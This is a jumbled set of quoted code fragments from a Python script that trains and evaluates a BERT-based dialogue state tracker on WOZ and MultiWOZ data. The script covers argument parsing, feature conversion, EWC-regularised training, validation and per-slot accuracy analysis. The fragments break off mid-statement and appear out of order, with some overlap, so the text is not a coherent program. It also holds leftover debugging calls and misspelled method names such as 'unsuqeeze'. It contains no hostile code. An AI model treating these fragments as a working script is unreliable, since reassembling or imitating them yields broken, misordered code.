prev_dev_acc += prev_acc.item()", "(prev_dialogue_idx is not None) and (prev_dialogue_idx != curr_dialogue_idx): if prev_turn_idx < max_turn_length: features", "max_seq_length) all_input_len = all_input_len.view(-1, max_turn_length, 2) all_label_ids = all_label_ids.view(-1, max_turn_length, slot_dim) all_prev_label_ids =", "to True.\\n\" \"0 (default value): dynamic loss scaling.\\n\" \"Positive power of 2: static", "prev_dev_loss = 0 prev_dev_acc = 0 prev_dev_loss_slot, prev_dev_acc_slot = None, None prev_nb_dev_examples =", "`do_eval` must be True.\") ############################################################################### # Load data ############################################################################### # Get Processor processor", "%d\", len(train_examples)) logger.info(\" Batch size = %d\", args.train_batch_size) logger.info(\" Num steps = %d\",", "default=None, type=str, required=True, help=\"Bert pre-trained model selected in the list: bert-base-uncased, \" \"bert-large-uncased,", "convert_examples_to_features( dev_examples, target_label_list, prev_label_list, args.max_seq_length, tokenizer, args.max_turn_length) logger.info(\"***** Running validation *****\") logger.info(\" Num", "# Prepare model if args.nbt =='rnn': from BeliefTrackerSlotQueryMultiSlot import BeliefTracker if args.task_name.find(\"gru\") ==", "% text) writer.write(\"---------- \\n\") logger.info(\"Done analysis: %s\" % output_eval_incorr_file) output_eval_incorr_file = os.path.join(args.output_dir, \"per_class_accuracy.txt\")", "val in prev_eval_loss_slot]), 'prev_eval_acc_slot': '\\t'.join([str((val).item()) for val in prev_eval_acc_slot]), 'total_acc_slot': '\\t'.join([str(val[1].item()) for val", "_label in enumerate(labels)} for labels in label_list] for i, label in enumerate(label): label", "dynamic loss scaling.\\n\" \"Positive power of 2: static loss scaling value.\\n\") parser.add_argument(\"--do_not_use_tensorboard\", action='store_true',", "Get slot-type embeddings ## Note: slot embeddings are ordered as [previous slots +", "for t in batch) input_ids, input_len, label_ids, prev_label_ids = batch if input_ids.dim() ==", "default=10.0, type=float, help=\"The number of epochs to allow no further improvement.\") parser.add_argument(\"--warmup_proportion\", default=0.1,", "0 dev_loss_slot, dev_acc_slot = None, None nb_dev_examples, nb_dev_steps = 0, 0 prev_dev_loss =", "target_slot=target_slot_id) prev_loss, prev_loss_slot, prev_acc, prev_acc_slot, _ = model(input_ids, input_len, prev_label_ids, n_gpu, target_slot=prev_slot_id) else:", "-1).sum().item() nslot = label_ids.size(2) for slot in range(nslot): for turn in range(nturn): class_count[slot][label_ids[0][turn][slot]]+=1", "len(tokens_a) > max_seq_length - 2: tokens_a = tokens_a[:(max_seq_length - 2)] tokens = [\"[CLS]\"]", "-1, 0).item() prev_dev_loss += prev_loss.item() * prev_num_valid_turn prev_dev_acc += prev_acc.item() * prev_num_valid_turn if", "input_len, prev_label_ids, n_gpu, target_slot=prev_slot_id) else: loss, loss_slot, acc, acc_slot, _ = model(input_ids, input_len,", "DistributedSampler from pytorch_pretrained_bert.tokenization import BertTokenizer from pytorch_pretrained_bert.optimization import BertAdam from tensorboardX import SummaryWriter", "ontology.keys(): ontology[slot].append(\"do not care\") ontology[slot].append(\"none\") fp_ontology.close() elif config.data_dir == \"data/multiwoz\": fp_ontology = open(os.path.join(config.data_dir,", "for param_group in optimizer.param_groups: param_group['lr'] = lr_this_step optimizer.step() optimizer.zero_grad() global_step += 1 #", "device=device, n_gpu=n_gpu) for epoch in trange(int(args.num_train_epochs), desc=\"Epoch\"): # for epoch in trange(1): ####", "+= loss.item() * num_valid_turn dev_acc += acc.item() * num_valid_turn prev_num_valid_turn = torch.sum(prev_label_ids[:,:,0].view(-1) >", "import DistributedDataParallel as DDP except ImportError: raise ImportError( \"Please install apex from https://www.github.com/nvidia/apex", "for Adam.\") parser.add_argument(\"--num_train_epochs\", default=3.0, type=float, help=\"Total number of training epochs to perform.\") parser.add_argument(\"--patience\",", "delimiter=\"\\t\", quotechar=quotechar) lines = [] for line in reader: if len(line) > 0", "multi-headed attention\") parser.add_argument(\"--do_train\", action='store_true', help=\"Whether to run training.\") parser.add_argument(\"--do_eval\", action='store_true', help=\"Whether to run", "class_acc = class_correct[sid][vid]/value writer.write(\"%s\\t%d\\t%d\\t%.3f\\n\"%(label_list[sid][vid], class_correct[sid][vid], value, class_acc) ) slot_class_acc += class_acc nlabels +=", "len(input_ids) == max_seq_length label_id, label_info = _get_label(example.label, label_list) prev_label_id, prev_label_info = _get_label(example.prev_label, prev_label_list)", "= DataLoader(dev_data, sampler=dev_sampler, batch_size=args.dev_batch_size) logger.info(\"Loaded data!\") ############################################################################### # Build the models ############################################################################### #", "loss_ewc prev_loss, _, prev_acc, prev_acc_slot, _ = model(input_ids, input_len, prev_label_ids, n_gpu, target_slot=prev_slot_id) prev_loss", "\"\"\"Base class for data converters for sequence classification data sets.\"\"\" def get_train_examples(self, data_dir):", "if args.do_eval and (args.local_rank == -1 or torch.distributed.get_rank() == 0): eval_examples = processor.get_test_examples(args.data_dir,", "= 0 prev_dev_loss_slot, prev_dev_acc_slot = None, None prev_nb_dev_examples = 0 for step, batch", "care of sychronizing nodes/GPUs torch.distributed.init_process_group(backend='nccl') logger.info(\"device: {} n_gpu: {}, distributed training: {}, 16-bits", "stability. Only used when fp16 set to True.\\n\" \"0 (default value): dynamic loss", "%d\" % max_turn) for (ex_index, example) in enumerate(examples): tokens_a = [x if x", "train_data = TensorDataset(all_input_ids, all_input_len, all_label_ids, all_prev_label_ids) if args.local_rank == -1: train_sampler = RandomSampler(train_data)", "index, line[1]: turn index if accumulation: if prev_dialogue_index is None or prev_dialogue_index !=", "if n_gpu == 1: loss_, loss_slot, acc, acc_slot, _ = model(input_ids, input_len, label_ids,", "model = DDP(model) elif n_gpu > 1: model = torch.nn.DataParallel(model) # Prepare optimizer", "n_gpu, target_slot=target_slot_id) loss = loss_ + args.lambda_ewc * ewc.penalty(model) prev_loss, prev_loss_slot, prev_acc, prev_acc_slot,", "input_ids, input_len, label_id, prev_label_id): self.input_ids = input_ids self.input_len = input_len self.label_id = label_id", "\"pytorch_model.bin\") if args.do_train: if n_gpu == 1: torch.save(model.state_dict(), output_model_file) else: torch.save(model.module.state_dict(), output_model_file) last_update", "total_slot_class_acc.append(slot_class_acc/(vid+1)) total_class_acc+=slot_class_acc total_class_acc /= nlabels for sid, slot_acc in enumerate(total_slot_class_acc): writer.write(\"%d\\t%.3f\\n\" % (sid,", "## utterances all_input_ids, all_input_len, all_label_ids, all_prev_label_ids = convert_examples_to_features( train_examples, target_label_list, prev_label_list, args.max_seq_length, tokenizer,", "+= tokens_b + [\"[SEP]\"] input_len[1] = len(tokens_b) + 1 input_ids = tokenizer.convert_tokens_to_ids(tokens) #", "self.text_a = text_a self.text_b = text_b self.label = label # Target slots in", "the training and evaluation ptr_model = torch.load(args.load_path, map_location=device) del_list = [] rename_list =", "input_len.unsqueeze(0) label_ids = label_ids.unsuqeeze(0) prev_label_ids = prev_label_ids.unsuqeeze(0) with torch.no_grad(): if n_gpu == 1:", "uncased model.\") parser.add_argument(\"--set_label_encoder_trainable\", action='store_true', help=\"Set this flag if you want to set the", "# Perform evaluation on validation dataset model.eval() dev_loss = 0 dev_acc = 0", "= [len(labels) for labels in label_list] # Number of labels of all slots", "key.replace('rnn.', 'nbt.') ptr_model[new_key] = ptr_model[key] del ptr_model[key] state = model.state_dict() state.update(ptr_model) model.load_state_dict(state) model.to(device)", "if ex_index < 5: logger.info(\"*** Example ***\") logger.info(\"guid: %s\" % example.guid) logger.info(\"tokens: %s\"", "logger.info(args) # CUDA setting if args.local_rank == -1 or args.no_cuda: device = torch.device(\"cuda\"", "all_input_ids_dev, all_input_len_dev, all_label_ids_dev, all_prev_label_ids_dev = convert_examples_to_features( dev_examples, target_label_list, prev_label_list, args.max_seq_length, tokenizer, args.max_turn_length) logger.info(\"*****", "args.gradient_accumulation_steps == 0: # modify learning rate with special warm up BERT uses", "get_optimizer_grouped_parameters(model.module) t_total = num_train_steps if args.local_rank != -1: t_total = t_total // torch.distributed.get_world_size()", "= acc_slot * num_valid_turn prev_dev_loss_slot = [ l * prev_num_valid_turn for l in", "prev_eval_acc_slot, \\ prev_loss, prev_loss_slot, prev_acc, prev_acc_slot, nb_eval_ex_prev) eval_loss /= nb_eval_examples if eval_loss_slot is", "= 0, 0 prev_dev_loss = 0 prev_dev_acc = 0 prev_dev_loss_slot, prev_dev_acc_slot = None,", "output_eval_incorr_file = os.path.join(args.output_dir, \"per_class_accuracy.txt\") with open(output_eval_incorr_file, \"w\") as writer: total_class_acc = 0 total_slot_class_acc", "on gpus\") parser.add_argument('--seed', type=int, default=42, help=\"random seed for initialization\") parser.add_argument('--gradient_accumulation_steps', type=int, default=1, help=\"Number", "tokenizer.convert_tokens_to_ids(tokens) # Zero-pad up to the sequence length. input_ids += [0] * (max_seq_length", "prev_dev_loss_slot[i] + l * prev_num_valid_turn prev_dev_acc_slot += prev_acc_slot * prev_num_valid_turn nb_dev_examples += num_valid_turn", "+= num_valid_turn prev_nb_dev_examples += prev_num_valid_turn dev_loss = dev_loss / nb_dev_examples dev_acc = dev_acc", "if n_gpu == 1: loss, loss_slot, acc, acc_slot, _ = model(input_ids, input_len, label_ids,", "(turn, processor.target_slot[slot], str(label_list[slot][label_ids[0][turn][slot].item()]), str(label_list[slot][pred_slot[0][turn][slot].item()]) )) plt.show() plt.savefig(os.path.join(args.output_dir, \"attention-d%d-slot%s.png\"%(len(incorrect_dialogs), slot))) plt.close() if not acc", "total_class_acc) logger.info(\"Done analysis: %s\" % output_eval_incorr_file) print(class_correct) print(class_count) if __name__ == \"__main__\": main()", "# Miscellaneous functions ############################################################################### def accuracy(out, labels): outputs = np.argmax(out, axis=1) return np.sum(outputs", "class DataProcessor(object): \"\"\"Base class for data converters for sequence classification data sets.\"\"\" def", "help=\"skip-connection\") parser.add_argument('--attn_head', type=int, default=4, help=\"the number of heads in multi-headed attention\") parser.add_argument(\"--do_train\", action='store_true',", "drawfig = False print('hotel') print(label_ids[0, 0:10, 8:18].cpu() == torch.Tensor(none_value_id[8:18]).long().repeat(10, 1)) print(pred_slot[0, 0:10, 8:18].cpu()", "class.\"\"\" return self._create_examples( self._read_tsv(os.path.join(data_dir, \"test.tsv\")), \"test\", accumulation) def get_labels(self): \"\"\"See base class.\"\"\" return", "\"Positive power of 2: static loss scaling value.\\n\") parser.add_argument(\"--do_not_use_tensorboard\", action='store_true', help=\"Whether to run", "not args.no_cuda else \"cpu\") n_gpu = torch.cuda.device_count() else: torch.cuda.set_device(args.local_rank) device = torch.device(\"cuda\", args.local_rank)", "eval_loss_slot]), 'eval_acc_slot':'\\t'.join([ str((val).item()) for val in eval_acc_slot]), 'prev_eval_loss': prev_eval_loss, 'prev_eval_accuracy': prev_eval_accuracy, 'prev_eval_loss_slot': '\\t'.join([str(val", "lr_this_step optimizer.step() optimizer.zero_grad() global_step += 1 # Perform evaluation on validation dataset model.eval()", "dev_loss_slot[i] = dev_loss_slot[i] + l * num_valid_turn dev_acc_slot += acc_slot * num_valid_turn for", "label_list] for i, label in enumerate(label): label = _hard_coding_label(label) label_id.append(label_map[i][label]) label_info += '%s", "= ewc.penalty(model) loss = loss_ + args.lambda_ewc * loss_ewc else: loss_, _, acc,", "= logging.FileHandler(os.path.join(args.output_dir, \"%s.txt\"%(tb_file_name))) logger.addHandler(fileHandler) logger.info(args) # CUDA setting if args.local_rank == -1 or", "max_turn_length) logger.info(\"max_turn_length = %d\" % max_turn) for (ex_index, example) in enumerate(examples): tokens_a =", "dev_loss < best_loss: # Save a trained model output_model_file = os.path.join(args.output_dir, \"pytorch_model.bin\") if", "%d\", len(eval_examples)) logger.info(\" Batch size = %d\", 1) eval_data = TensorDataset(all_input_ids, all_input_len, all_label_ids)", "list(self.ontology.items()) for idx, domain in enumerate(ontology_items): slot, value = domain if slot ==", "all_prev_label_ids.to(device) train_data = TensorDataset(all_input_ids, all_input_len, all_label_ids, all_prev_label_ids) if args.local_rank == -1: train_sampler =", "#### TRAIN model.train() tr_loss = 0 nb_tr_examples, nb_tr_steps = 0, 0 for step,", "param_optimizer if not any(nd in n for nd in no_decay)], 'weight_decay': 0.01, 'lr':", "= TensorDataset(all_input_ids, all_input_len, all_label_ids, all_prev_label_ids) # Run prediction for full data eval_sampler =", "help=\"hidden dimension used in belief tracker\") parser.add_argument('--num_rnn_layers', type=int, default=1, help=\"number of RNN layers\")", "tasks class DataProcessor(object): \"\"\"Base class for data converters for sequence classification data sets.\"\"\"", "__init__(self, guid, text_a, text_b=None, label=None, prev_label=None): self.guid = guid self.text_a = text_a self.text_b", "= all_label_ids.view(-1, max_turn_length, slot_dim) all_prev_label_ids = all_prev_label_ids.view(-1, max_turn_length, prev_slot_dim) return all_input_ids, all_input_len, all_label_ids,", "in enumerate(processor.target_slot): summary_writer.add_scalar(\"Train/Loss_%s\" % slot.replace(' ','_'), loss_slot[i], global_step) summary_writer.add_scalar(\"Train/Acc_%s\" % slot.replace(' ','_'), acc_slot[i],", "default=16, type=int, help=\"Total batch size for eval.\") parser.add_argument(\"--learning_rate\", default=5e-5, type=float, help=\"The initial learning", "initialization\") parser.add_argument('--gradient_accumulation_steps', type=int, default=1, help=\"Number of updates steps to accumulate before performing a", "= label # Target slots in this training task self.prev_label = prev_label #", "label_len, slot_token_ids, slot_len) if n_gpu > 1: model = torch.nn.DataParallel(model) if args.do_eval and", "ontology = ontology[\"informable\"] del ontology[\"request\"] for slot in ontology.keys(): ontology[slot].append(\"do not care\") ontology[slot].append(\"none\")", "if accumulation: if prev_dialogue_index is None or prev_dialogue_index != line[0]: text_a = line[2]", "scaling to improve fp16 numeric stability. Only used when fp16 set to True.\\n\"", "## Note: slot embeddings are ordered as [previous slots + present target slots]", "from https://www.github.com/nvidia/apex to use distributed and fp16 training.\") optimizer = FusedAdam(optimizer_grouped_parameters, lr=args.learning_rate, bias_correction=False,", "label # Target slots in this training task self.prev_label = prev_label # trained", "or torch.distributed.get_rank() == 0): eval_examples = processor.get_test_examples(args.data_dir, accumulation=accumulation) all_input_ids, all_input_len, all_label_ids, all_prev_label_ids =", "0 prev_dev_acc = 0 prev_dev_loss_slot, prev_dev_acc_slot = None, None prev_nb_dev_examples = 0 for", "1 def _post_process(eval_loss, eval_loss_slot, eval_accuracy, eval_acc_slot, loss, loss_slot, acc, acc_slot, nb_eval_ex): eval_loss +=", "open(output_eval_incorr_file, \"w\") as writer: for dialog in incorrect_dialogs: for turn in dialog: text", "required=False, help=\"Tensorboard directory\") parser.add_argument(\"--nbt\", default='rnn', type=str, required=True, help=\"nbt type: rnn or transformer or", "for t in batch) input_ids, input_len, label_ids, _ = batch if n_gpu ==", "\"%s.txt\"%(tb_file_name))) logger.addHandler(fileHandler) logger.info(args) # CUDA setting if args.local_rank == -1 or args.no_cuda: device", "in config.prev_slot.split(':')]) ontology_items = list(self.ontology.items()) for idx, domain in enumerate(ontology_items): slot, value =", "if n_gpu > 0: torch.cuda.manual_seed_all(args.seed) if not args.do_train and not args.do_eval and not", "label_len)) all_label_token_ids = torch.tensor([f[0] for f in features], dtype=torch.long).to(device) all_label_len = torch.tensor([f[1] for", "not None: summary_writer.add_scalar(\"Validate/Loss\", dev_loss, global_step) summary_writer.add_scalar(\"Validate/Acc\", dev_acc, global_step) summary_writer.add_scalar(\"Validate/Prev_Loss\", prev_dev_loss, global_step) summary_writer.add_scalar(\"Validate/Prev_Acc\", prev_dev_acc,", "\\ % (epoch, dev_loss, dev_acc, prev_dev_loss, prev_dev_acc)) dev_loss = round(dev_loss, 6) if last_update", "best_acc = dev_acc logger.info(\"*** Model Updated: Epoch=%d, Validation Loss=%.6f, Validation Acc=%.6f ***\" %", "trange(int(args.num_train_epochs), desc=\"Epoch\"): # for epoch in trange(1): #### TRAIN model.train() tr_loss = 0", "= self.prev_slot + self.target_slot logger.info('Processor: previous slots: ' + ', '.join(self.prev_slot)) logger.info('Processor: target", "max_turn_length, prev_slot_dim) return all_input_ids, all_input_len, all_label_ids, all_prev_label_ids def get_label_embedding(labels, max_seq_length, tokenizer, device): features", "evaluation on validation dataset model.eval() dev_loss = 0 dev_acc = 0 dev_loss_slot, dev_acc_slot", "f in features], dtype=torch.long).to(device) return all_label_token_ids, all_label_len def _truncate_seq_pair(tokens_a, tokens_b, max_length): \"\"\"Truncates a", "x != '#' else '[SEP]' for x in tokenizer.tokenize(example.text_b)] _truncate_seq_pair(tokens_a, tokens_b, max_seq_length -", "':'.join(prev_slot) else: raise NotImplementedError() # sorting the ontology according to the alphabetic order", "in features], dtype=torch.long) all_prev_label_ids = torch.tensor([f.prev_label_id for f in features], dtype=torch.long) # reshape", ") parser.add_argument(\"--tf_dir\", default='tensorboard', type=str, required=False, help=\"Tensorboard directory\") parser.add_argument(\"--nbt\", default='rnn', type=str, required=True, help=\"nbt type:", "0 total_slot_class_acc = [] nlabels = 0 for sid, slot in enumerate(class_count): slot_class_acc", "or `do_eval` must be True.\") ############################################################################### # Load data ############################################################################### # Get Processor", "of updates steps to accumulate before performing a backward/update pass.\") parser.add_argument('--fp16', action='store_true', help=\"Whether", "* nb_eval_ex eval_accuracy += acc.item() * nb_eval_ex if loss_slot is not None: if", "DistributedDataParallel as DDP except ImportError: raise ImportError( \"Please install apex from https://www.github.com/nvidia/apex to", "global_step) summary_writer.add_scalar(\"Train/Loss_Total\", loss, global_step) summary_writer.add_scalar(\"Train/JointAcc\", acc, global_step) if n_gpu == 1: for i,", "if args.loss_scale == 0: optimizer = FP16_Optimizer(optimizer, dynamic_loss_scale=True) else: optimizer = FP16_Optimizer(optimizer, static_loss_scale=args.loss_scale)", "%d\", len(eval_examples)) logger.info(\" Batch size = %d\", args.eval_batch_size) eval_data = TensorDataset(all_input_ids, all_input_len, all_label_ids,", "-1).sum().item() nb_eval_examples_prev += nb_eval_ex_prev nb_eval_ex = (label_ids[:,:,0].view(-1) != -1).sum().item() nb_eval_examples += nb_eval_ex nb_eval_steps", "Running analysis *****\") logger.info(\" Num examples = %d\", len(eval_examples)) logger.info(\" Batch size =", "prev_dev_loss_slot, prev_dev_acc_slot = None, None prev_nb_dev_examples = 0 for step, batch in enumerate(tqdm(dev_dataloader,", "dev_examples = processor.get_dev_examples(args.data_dir, accumulation=accumulation) num_train_steps = int(len(train_examples) / args.train_batch_size * args.num_train_epochs) num_dev_steps =", "Perform evaluation on validation dataset model.eval() dev_loss = 0 dev_acc = 0 dev_loss_slot,", "os.path.join(args.output_dir, \"incorrect_dialog.txt\") with open(output_eval_incorr_file, \"w\") as writer: for dialog in incorrect_dialogs: for turn", "# Prepare optimizer if args.do_train: def get_optimizer_grouped_parameters(model): param_optimizer = [(n, p) for n,", "'eval_results' if args.target_slot=='all': out_file_name += '_all' output_eval_file = os.path.join(args.output_dir, \"%s.txt\" % out_file_name) with", "= all_input_ids.to(device), all_input_len.to( device), all_label_ids.to(device) logger.info(\"***** Running analysis *****\") logger.info(\" Num examples =", "= model(input_ids, input_len, label_ids, n_gpu, target_slot=target_slot_id) prev_loss, prev_loss_slot, prev_acc, prev_acc_slot, _ = model(input_ids,", "attention_draw): max_len = input_ids.size(2) attn_scores = model.attn.get_scores().transpose(1, 2).contiguous().view(label_ids.size(1)*nslot, -1, max_len) for slot in", "= [] for input, label, pred in zip(input_ids[0], label_ids[0], pred_slot[0]): if label[0] ==", "all_label_ids_dev.to(device), all_prev_label_ids_dev.to(device) dev_data = TensorDataset(all_input_ids_dev, all_input_len_dev, all_label_ids_dev, all_prev_label_ids_dev) dev_sampler = SequentialSampler(dev_data) dev_dataloader =", "will be truncated, and sequences shorter \\n\" \"than this will be padded.\") parser.add_argument('--hidden_dim',", "None if example.text_b: tokens_b = [x if x != '#' else '[SEP]' for", "type=str, required=True, help=\"The output directory where the model predictions and checkpoints will be", "reader = csv.reader(f, delimiter=\"\\t\", quotechar=quotechar) lines = [] for line in reader: if", "last_update is None or dev_loss < best_loss: # Save a trained model output_model_file", "from apex.parallel import DistributedDataParallel as DDP except ImportError: raise ImportError( \"Please install apex", "(last_update, best_loss, best_acc)) else: logger.info(\"*** Model NOT Updated: Epoch=%d, Validation Loss=%.6f, Validation Acc=%.6f", "0.1 = 10%% of training.\") parser.add_argument(\"--lambda_ewc\", default=0.1, type=float, help=\"Hyper-parameter for EWC\") parser.add_argument(\"--no_cuda\", action='store_true',", "1: loss_, loss_slot, acc, acc_slot, _ = model(input_ids, input_len, label_ids, n_gpu, target_slot=target_slot_id) loss", "class.\"\"\" return [ self.ontology[slot] for slot in self.prev_slot] def _create_examples(self, lines, set_type, accumulation=False):", "vmax=1.0, cbar=False, ax=ax) class_correct = [[0 for x in range(num_labels[i])] for i in", "dev_acc_slot = None, None nb_dev_examples, nb_dev_steps = 0, 0 prev_dev_loss = 0 prev_dev_acc", "all_input_ids, all_input_len, all_label_ids, all_prev_label_ids def get_label_embedding(labels, max_seq_length, tokenizer, device): features = [] for", "== 1: for i, slot in enumerate(processor.target_slot): summary_writer.add_scalar(\"Train/Loss_%s\" % slot.replace(' ','_'), loss_slot[i], global_step)", "args.target_slot=='all': out_file_name += '_all' output_eval_file = os.path.join(args.output_dir, \"%s.txt\" % out_file_name) with open(output_eval_file, \"w\")", "print(\"Slot\", slot) for turn in range(nturn): draw(attn_scores[slot*label_ids.size(1)+turn,:,:].cpu(), tokenizer.convert_ids_to_tokens(input_ids[0][turn].cpu().numpy()), [*range(0, args.attn_head)], ax=axs[turn]) axs[turn].set_title(\"turn %d", "tokenizer, device) model.initialize_slot_value_lookup(label_token_ids, label_len, slot_token_ids, slot_len) if n_gpu > 1: model = torch.nn.DataParallel(model)", "in self.prev_slot_idx: self.prev_slot.append(slot) self.all_slot = self.prev_slot + self.target_slot logger.info('Processor: previous slots: ' +", "'0:1:2 or an excluding slot name 'attraction'\" ) parser.add_argument(\"--prev_slot\", default='', type=str, required=True, help=\"Previous", "config.data_dir == \"data/woz\" or config.data_dir==\"data/woz-turn\": fp_ontology = open(os.path.join(config.data_dir, \"ontology_dstc2_en.json\"), \"r\") ontology = json.load(fp_ontology)", "parser.add_argument('--data_dir', type=str, required=True, help='location of the data corpus') parser.add_argument(\"--bert_model\", default=None, type=str, required=True, help=\"Bert", "steps = %d\", num_dev_steps) all_input_ids_dev, all_input_len_dev, all_label_ids_dev, all_prev_label_ids_dev = \\ all_input_ids_dev.to(device), all_input_len_dev.to(device), all_label_ids_dev.to(device),", "set the label encoder trainable. \\n\" \"This option is valid only when using", "class.\"\"\" return self._create_examples( self._read_tsv(os.path.join(data_dir, \"train.tsv\")), \"train\", accumulation) def get_dev_examples(self, data_dir, accumulation=False): \"\"\"See base", "/ nb_tr_steps if args.do_train else None result = {'eval_loss': eval_loss, 'eval_accuracy': eval_accuracy, 'loss':", "all_label_ids = convert_examples_to_features( eval_examples, label_list, args.max_seq_length, tokenizer, args.max_turn_length) all_input_ids, all_input_len, all_label_ids = all_input_ids.to(device),", "max_turn_length, max_seq_length) all_input_len = all_input_len.view(-1, max_turn_length, 2) all_label_ids = all_label_ids.view(-1, max_turn_length, slot_dim) all_prev_label_ids", "# Tensorboard logging if not args.do_not_use_tensorboard: summary_writer = SummaryWriter(\"./%s/%s\" % (args.tf_dir, tb_file_name)) else:", "0 eval_loss_slot, eval_acc_slot = None, None nb_eval_steps, nb_eval_examples = 0, 0 prev_eval_loss, prev_eval_accuracy", "l * num_valid_turn dev_acc_slot += acc_slot * num_valid_turn for i, l in enumerate(prev_loss_slot):", "else: prev_slot.append(value) config.target_slot = ':'.join(target_slot) config.prev_slot = ':'.join(prev_slot) else: raise NotImplementedError() # sorting", "try: from apex.optimizers import FP16_Optimizer from apex.optimizers import FusedAdam except ImportError: raise ImportError(", "0, 0 for step, batch in enumerate(tqdm(train_dataloader, desc=\"Iteration\")): batch = tuple(t.to(device) for t", "if torch.cuda.is_available() and not args.no_cuda else \"cpu\") n_gpu = torch.cuda.device_count() else: torch.cuda.set_device(args.local_rank) device", "= 0 prev_dev_acc = 0 prev_dev_loss_slot, prev_dev_acc_slot = None, None prev_nb_dev_examples = 0", "= processor.get_test_examples(args.data_dir, accumulation=accumulation) all_input_ids, all_input_len, all_label_ids, all_prev_label_ids = convert_examples_to_features( eval_examples, target_label_list, prev_label_list, args.max_seq_length,", "ontology_items = list(self.ontology.items()) for idx, domain in enumerate(ontology_items): slot, value = domain if", "data file into a list of `InputBatch`s.\"\"\" slot_dim = len(label_list) prev_slot_dim = len(prev_label_list)", "' % (label, label_map[i][label]) return label_id, label_info features = [] prev_dialogue_idx = None", "if prev_turn_idx < max_turn_length: features += [InputFeatures(input_ids=all_padding, input_len=all_padding_len, label_id=[-1]*slot_dim, prev_label_id=[-1]*prev_slot_dim)] * (max_turn_length -", "tracker\") parser.add_argument('--num_rnn_layers', type=int, default=1, help=\"number of RNN layers\") parser.add_argument('--zero_init_rnn', action='store_true', help=\"set initial hidden", "all_input_ids, all_input_len, all_label_ids = convert_examples_to_features( eval_examples, label_list, args.max_seq_length, tokenizer, args.max_turn_length) all_input_ids, all_input_len, all_label_ids", "default='/gfs/nlp/.pytorch_pretrained_bert', type=str, required=False, help=\"The directory of the pretrained BERT model\") parser.add_argument(\"--task_name\", default=None, type=str,", "n_gpu = torch.cuda.device_count() else: torch.cuda.set_device(args.local_rank) device = torch.device(\"cuda\", args.local_rank) n_gpu = 1 #", "summary_writer.add_scalar(\"Validate/Loss\", dev_loss, global_step) summary_writer.add_scalar(\"Validate/Acc\", dev_acc, global_step) summary_writer.add_scalar(\"Validate/Prev_Loss\", prev_dev_loss, global_step) summary_writer.add_scalar(\"Validate/Prev_Acc\", prev_dev_acc, global_step) if", "key): del_list.append(key) for key in del_list: del ptr_model[key] if n_gpu > 1: model", "elif n_gpu > 1: model = torch.nn.DataParallel(model) # Prepare optimizer if args.do_train: def", "+= '%s\\t%s\\t'%(label, pred) writer.write(\"%s\\n\" % text) writer.write(\"---------- \\n\") logger.info(\"Done analysis: %s\" % output_eval_incorr_file)", "args.max_label_length, tokenizer, device) model.initialize_slot_value_lookup(label_token_ids, label_len, slot_token_ids, slot_len) if n_gpu > 1: model =", "prev_eval_loss = prev_eval_loss / nb_eval_examples_prev prev_eval_accuracy = prev_eval_accuracy / nb_eval_examples_prev eval_acc_slot = eval_acc_slot", "############################################################################### # Prepare model if args.nbt =='rnn': from BeliefTrackerSlotQueryMultiSlot import BeliefTracker if args.task_name.find(\"gru\")", "== \"pricerange\": slot = \"price range\" if idx in self.target_slot_idx: self.target_slot.append(slot) elif idx", "all_input_ids, all_input_len, all_label_ids, all_prev_label_ids = convert_examples_to_features( train_examples, target_label_list, prev_label_list, args.max_seq_length, tokenizer, args.max_turn_length) logger.info(\"*****", "0:10, 0:8].cpu() == torch.Tensor(none_value_id[0:8]).long().repeat(10, 1)) print(label_ids[0, 0:10, 18:].cpu() == torch.Tensor(none_value_id[18:]).long().repeat(10, 1)) pdb.set_trace() if", "prev_eval_acc_slot]), (target_slot_id+prev_slot_id)): total_acc_slot[idx] = val total_acc_slot = sorted(total_acc_slot.items(), key=operator.itemgetter(0)) loss = tr_loss /", "to use distributed and fp16 training.\") optimizer = FusedAdam(optimizer_grouped_parameters, lr=args.learning_rate, bias_correction=False, max_grad_norm=1.0) if", "data_dir, accumulation=False): \"\"\"See base class.\"\"\" return self._create_examples( self._read_tsv(os.path.join(data_dir, \"test.tsv\")), \"test\", accumulation) def get_labels(self):", "max_seq_length label_id, label_info = _get_label(example.label, label_list) prev_label_id, prev_label_info = _get_label(example.prev_label, prev_label_list) if ex_index", "slot_class_acc = 0 for vid, value in enumerate(slot): if not value == 0:", "model. ex. '0:1:2 or an excluding slot name 'attraction'\" ) parser.add_argument(\"--prev_slot\", default='', type=str,", "convert_examples_to_features( eval_examples, label_list, args.max_seq_length, tokenizer, args.max_turn_length) all_input_ids, all_input_len, all_label_ids = all_input_ids.to(device), all_input_len.to( device),", "tokenizer.convert_ids_to_tokens(input_ids[0][turn].cpu().numpy()), [*range(0, args.attn_head)], ax=axs[turn]) axs[turn].set_title(\"turn %d slot: %s label: %s pred: %s\" %", "for val, idx in zip(torch.cat([eval_acc_slot, prev_eval_acc_slot]), (target_slot_id+prev_slot_id)): total_acc_slot[idx] = val total_acc_slot = sorted(total_acc_slot.items(),", "train_examples = processor.get_train_examples(args.data_dir, accumulation=accumulation) dev_examples = processor.get_dev_examples(args.data_dir, accumulation=accumulation) num_train_steps = int(len(train_examples) / args.train_batch_size", "import csv import os import logging import argparse import random import collections import", "print(label_ids[0, 0:10, 0:8].cpu() == torch.Tensor(none_value_id[0:8]).long().repeat(10, 1)) print(label_ids[0, 0:10, 18:].cpu() == torch.Tensor(none_value_id[18:]).long().repeat(10, 1)) pdb.set_trace()", "reproducibility. random.seed(args.seed) np.random.seed(args.seed) torch.manual_seed(args.seed) if n_gpu > 0: torch.cuda.manual_seed_all(args.seed) if not args.do_train and", "help=\"The maximum total input sequence length after WordPiece tokenization. \\n\" \"Sequences longer than", "slots #prev_slot_id = processor.prev_slot_idx #target_slot_id = processor.target_slot_idx # wrong prev_slot_id = list(range(0, len(processor.prev_slot)))", "[\"[SEP]\"] label_token_ids = tokenizer.convert_tokens_to_ids(label_tokens) label_len = len(label_token_ids) label_padding = [0] * (max_seq_length -", "in no_decay)], 'weight_decay': 0.01, 'lr': args.learning_rate}, {'params': [p for n, p in param_optimizer", "TensorDataset(all_input_ids, all_input_len, all_label_ids) # Run prediction for full data eval_sampler = SequentialSampler(eval_data) eval_dataloader", "param_optimizer = [(n, p) for n, p in model.named_parameters() if p.requires_grad] no_decay =", "= [], [] for labels in label_list: token_ids, lens = get_label_embedding(labels, args.max_label_length, tokenizer,", "-1: t_total = t_total // torch.distributed.get_world_size() if args.fp16: try: from apex.optimizers import FP16_Optimizer", "eval_examples = processor.get_test_examples(args.data_dir, accumulation=accumulation) all_input_ids, all_input_len, all_label_ids, all_prev_label_ids = convert_examples_to_features( 